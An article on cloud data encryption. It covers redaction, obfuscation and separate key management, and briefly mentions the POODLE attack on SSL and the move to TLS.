POODLE (Padding Oracle on Downgraded Legacy Encryption): A Step towards Better Cloud Security


Cloud encryption is a service that is offered by cloud service providers that encrypt all the data that will be stored on the cloud. The encryption process works on an algorithm that transforms the data. Cloud encryption is almost identical to the in-house encryption that transforms the data into a cipher-text and then again deciphers the data as it is deciphered using the key. However, cloud encryption differs from the usual encryption method because the user doesn’t have to deal with the provider’s policies and procedures for encryption. Before the encryption process, the enterprises have to go through the encryption key management. The encryption competences of the cloud service providers depend on the level of sensitivity of the data that being hosted. Encryption actually encompasses more of processor speed than all the other applications. Many cloud providers offer only basic encryption based on few database information types such as passwords and account numbers. Currently, many of the enterprises aren’t adopting the encryption as a security measure to store data on the cloud because of the expense of encryption and decryption due to the reduction in the speed of data processing. To keep the process of data channelized many providers are offering encryption solutions such as –redacting and obfuscating. It keeps the data confidential without slowing the data process.

1. Data Redaction: Data redaction is the suppression of sensitive data for all types of Personally Identifiable Information (PII). Using the redaction the enterprise can transform the data into a pattern that doesn’t contain any of the identifiable information.

2. Obfuscating: Converting simple text into random text that makes it difficult to understand. An algorithm is used to encrypt and decrypt the data for security.

Encryption was majority used to protect the data in the multi-tenant environment. Encryption, when implemented properly, can be used to protect the enterprise’s sensitive data when the user doesn’t control the environment. The encryption allows the data to be protected for both private and public cloud but more applicable to the public cloud with users and data sensitivity levels. Encrypting the cloud data can be much more imperative for the enterprises that store sensitive user data on cloud and implementation of that on the traditional infrastructure will be different.  For cloud encryption, there are three major components depending on- Data, an encryption engine, and key management. In cloud architecture, the three-step process is used across the entire system is all distributed in different locations.

Let’s learn more about how these three distributed components can secure your cloud security architectures:

1. The Cloud Data Storage implements the Virtual Private Storage architecture. Encrypt the data before its being transferred to the cloud and decrypt the data before the transmission.  For example, the enterprises can use the cloud backup service to encrypt the data locally using the local key before storing the data on the cloud.  Since the management of the key depends on the enterprises it’s important that all the policies are followed.

2. For basic encryption of data stored, an enterprise can prefer using the volume encryption to store the data in the second encrypted volume. For enterprises, the encryption of data come in with risks that a person can access your data as the given key can be assessed through the volume. For example, if enterprises created their own encryption key and now the cloud providers have no actual way of authenticating the OS or application any intruder can access the data.

3. With advanced encryption, the enterprise can separate the key from the encryption engine. In the three-tier encryption architecture the encrypted volume of data, encryption engine, and the key management server are all kept separated from each other. The key is usually separated from the data and engine so that even if the intruder is able to gain access to the data they cannot actually get the data. The external key management server only returns the key for the policy based criteria such as manual approval.  

There is currently the three ways using which the data distribution can be done. The encryption engine, key management, and data all three different entities are the usage of physical terms to define the encryption scenario. The use of virtual private storage for the SaaS in commercial products in an enterprise network and proxy traffic for the SaaS provider; it encrypts the sensitive form of the data. For each of the cloud configurations, its different methodologies of encryption need to implement that can be solved to protect the data. Designing a secured structure to protect the data even for the multitenant environment, the structure can be used to control.

Implementation of Encryption for Data Protection

Before the enterprises start adopting the third party encryption engine and key management solution it’s imperative that they understand what protocols are being followed for transmitting the data. The currently used Secure Socket Layer (SSL) approach that had been the standard for many years has been scrutinized after the discovery of POODLE (Padding Oracle On Downgraded Legacy Encryption) attack, a man in the middle kind of attack can be exploited to get access to the data. Implementing the current TLS rather than the SSL eliminate the vulnerability. Some of the legacy operating systems such as Windows XP are currently unable to implement the TLS. This makes some of the cloud providers still adopt the SSL instead of TLS even though there is a risk of data comprising.  Completely eliminating the SSL will mean that many of the legacy hardware will not be able to process the data available on the system.

Many enterprises believe that the cloud provider is better in protecting the sensitivities data rather than the own company resources. Cloud providers are not subjected to the same laws or we can say the same regulations to deal with a data breach. The data owned by the enterprises is actually responsible for all the data and it can cause an uproar for the same. A combination of encryption and policies can help to remove cloud security challenges and bring newer innovations.


Please enter your comment!
Please enter your name here